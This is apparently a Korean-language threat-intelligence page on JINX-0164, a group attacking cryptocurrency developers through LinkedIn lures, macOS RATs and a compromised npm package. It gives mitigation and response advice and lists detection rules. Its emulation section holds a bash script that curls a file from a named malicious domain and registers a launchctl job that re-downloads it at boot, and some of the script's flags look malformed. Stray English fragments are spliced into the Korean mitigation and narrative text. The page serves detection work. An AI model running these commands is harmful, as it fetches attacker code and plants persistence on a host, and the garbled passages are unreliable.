팔로우 
요약
재정 동기를 가진 위협 행위자인 JINX-0164가 LinkedIn 소셜 엔지니어링, macOS 악성코드 및 CI/CD 손상을 통해 암호화폐 개발자를 대상으로 하고 있습니다. 이 그룹은 AUDIOFIX라는 맞춤형 Python RAT과 MINIRAT이라는 Go 기반 백도어를 배포하며, 둘 다 하드코딩된 명령 및 제어 도메인과 통신하도록 구성되어 있습니다. 접근 권한을 획득한 후 공격자들은 클라우드와 개발 자격 증명을 도용하고 코드 저장소를 조작하며, 심지어 악성 npm 패키지를 출판하여 접근을 확장하고 암호화폐 도난을 가능하게 합니다. 이 캠페인은 소프트웨어 개발 생명주기를 겨냥한 정교한 공급망 위협을 반영합니다.
조사
Wiz CIRT는 초기 LinkedIn 접근부터 악성 링크 전달, macOS 페이로드 실행, 자격 증명 도난, 소스 코드 저장소로의 횡단 이동을 통해 침입을 추적했습니다. 이들의 조사는 드로퍼 스크립트, 지속성을 통한 launchctl과 nord-stream 도구를 통한 비밀 유출도 드러났습니다. 연구원들은 또한 여러 개의 가짜 도메인, VPN 종료 노드 및 @velora-dex/sdk npm 패키지를 포함한 공급망 손상도 식별했습니다. 탐지 및 위협 수색을 지원하기 위해 파일 경로, 해시, 도메인, IP 주소가 수집되었습니다.
완화
권장 방어 조치에는 macOS 시스템에서의 지속성 모니터링, 의심스러운 LaunchAgents 탐지 및 알려진 악성 도메인과 명령 및 제어 서버 차단이 포함됩니다. 조직은 서명된 커밋을 시행하고 GitHub Vigilant 모드를 활성화하며, 검증되지 않은 커밋이나 비정상적인 CI/CD 워크플로 변경을 주시해야 합니다. VPN 사용은 승인된 제공업체로 제한되어야 하며, 클라우드 계정과 개발 플랫폼에는 MFA가 필요합니다. launchctl persistence, detecting suspicious LaunchAgents, and blocking the known malicious domains and command-and-control servers. Organizations should enforce signed commits, enable GitHub Vigilant Mode, and watch for unverified commits or unusual CI/CD workflow changes. VPN use should be limited to approved providers, and MFA should be required for cloud accounts and development platforms.
대응
이 활동이 감지되면 영향을 받은 macOS 시스템을 즉시 격리하고 디지털 증거를 수집하며, 손상된 자격 증명 및 API 토큰을 폐기하십시오. 보안 팀은 악의적인 커밋에 대한 코드 저장소 전체 검토를 수행하고 손상된 npm 패키지를 제거해야 합니다. 식별된 명령 및 제어 도메인을 차단하고 방화벽 규칙을 업데이트하여 악성 IP 주소로의 트래픽을 차단해야 합니다. 관련 이해관계자에게 알리고 신뢰할 수 있는 산업 파트너와의 위협 인텔리전스 공유를 고려해야 합니다.
공격 흐름
이 부분은 아직 업데이트 중입니다. 알림을 받으려면 가입하세요.
알림 받기탐지
의심스러운 파일 다운로드 직접 IP (프록시를 통해)
보기
가능한 IP 조회 도메인 통신 시도 (DNS를 통해)
보기
MacOS Launchctl 실행 시도 (cmdline을 통해)
보기
chmod 및 nohup을 단일 명령어로 사용한 가능성 있는 실행 (cmdline을 통해)
보기
Base64로 인코딩된 문자열 조작 가능성 [MacOS] (cmdline을 통해)
보기
의심스러운 Curl 실행 시도 [MacOS] (cmdline을 통해)
보기
탐지를 위한 IOCs (HashSha256): 암호화폐 산업의 소프트웨어 개발 인프라를 타겟으로 신종 위협 행위자
보기
탐지를 위한 IOCs (SourceIP): 암호화폐 산업의 소프트웨어 개발 인프라를 타겟으로 신종 위협 행위자
보기
탐지를 위한 IOCs (DestinationIP): 암호화폐 산업의 소프트웨어 개발 인프라를 타겟으로 신종 위협 행위자
보기
AUDIOFIX 악성코드 지속성 및 페이로드 다운로드 탐지 [Linux 프로세스 생성]
보기
시뮬레이션 실행
전제 조건: 원격 측정 및 기준선 사전 비행 검사 통과가 필요합니다.
이유: 이 섹션은 감지 규칙을 유도하도록 설계된 적대적 기술 (TTP)의 정확한 실행을 상세히 설명합니다. 명령어와 내러티브는 식별된 TTP를 직접 반영해야 하며, 감지 로직에 의해 기대되는 정확한 원격 측정을 생성하는 것을 목표로 합니다.
-
공격 내러티브 및 명령어:
- 초기 발판: 공격자는 악성 링크가 포함된 피싱 이메일(T1566.004)을 전달합니다. 피해자는 이 링크를 클릭하여
https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh. - 페이로드 다운로드: 피해자의 터미널은
curl명령어를 실행하여 스크립트를 조용히 가져옵니다. - 지속성 설정: 스크립트는
launchctl submit을 사용하여 런치 에이전트를 등록하고 동일한 명령어를 삽입하여 부팅 시마다 페이로드를 다시 다운로드하도록 합니다 (T1546.006).curlcommand so the payload is re‑downloaded on each boot (T1546.006). - 실행: 런치 에이전트는 시스템 권한으로 실행되어 다운로드된 스크립트를 실행하여 호스트를 손상시킵니다.
- 초기 발판: 공격자는 악성 링크가 포함된 피싱 이메일(T1566.004)을 전달합니다. 피해자는 이 링크를 클릭하여
-
회귀 테스트 스크립트: (테스트 macOS 기계에서 실행; 관리자 권한 필요)
#!/bin/bash set -euo pipefail # 1. 악성 curl 다운로드 시뮬레이션 (실제 악성 코드 없음) MALICIOUS_URL="https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh" curl -fsSL "$MALICIOUS_URL" -o /tmp/audio-fix.sh # 2. 부팅 시 스크립트를 다시 다운로드하는 런치 에이전트 등록 launchctl submit -l com.malicious.audiofix -p /usr/bin/curl -a -c -t "30" /usr/bin/curl -fsSL "$MALICIOUS_URL" -o /tmp/audio-fix.sh echo "악성 런치 에이전트가 등록되었습니다. 탐지를 위해 SIEM을 확인하십시오." -
정리 명령어:
# 런치 에이전트 제거 launchctl remove com.malicious.audiofix || true # 다운로드된 스크립트 삭제 rm -f /tmp/audio-fix.sh echo "정리 완료."
보고서 종료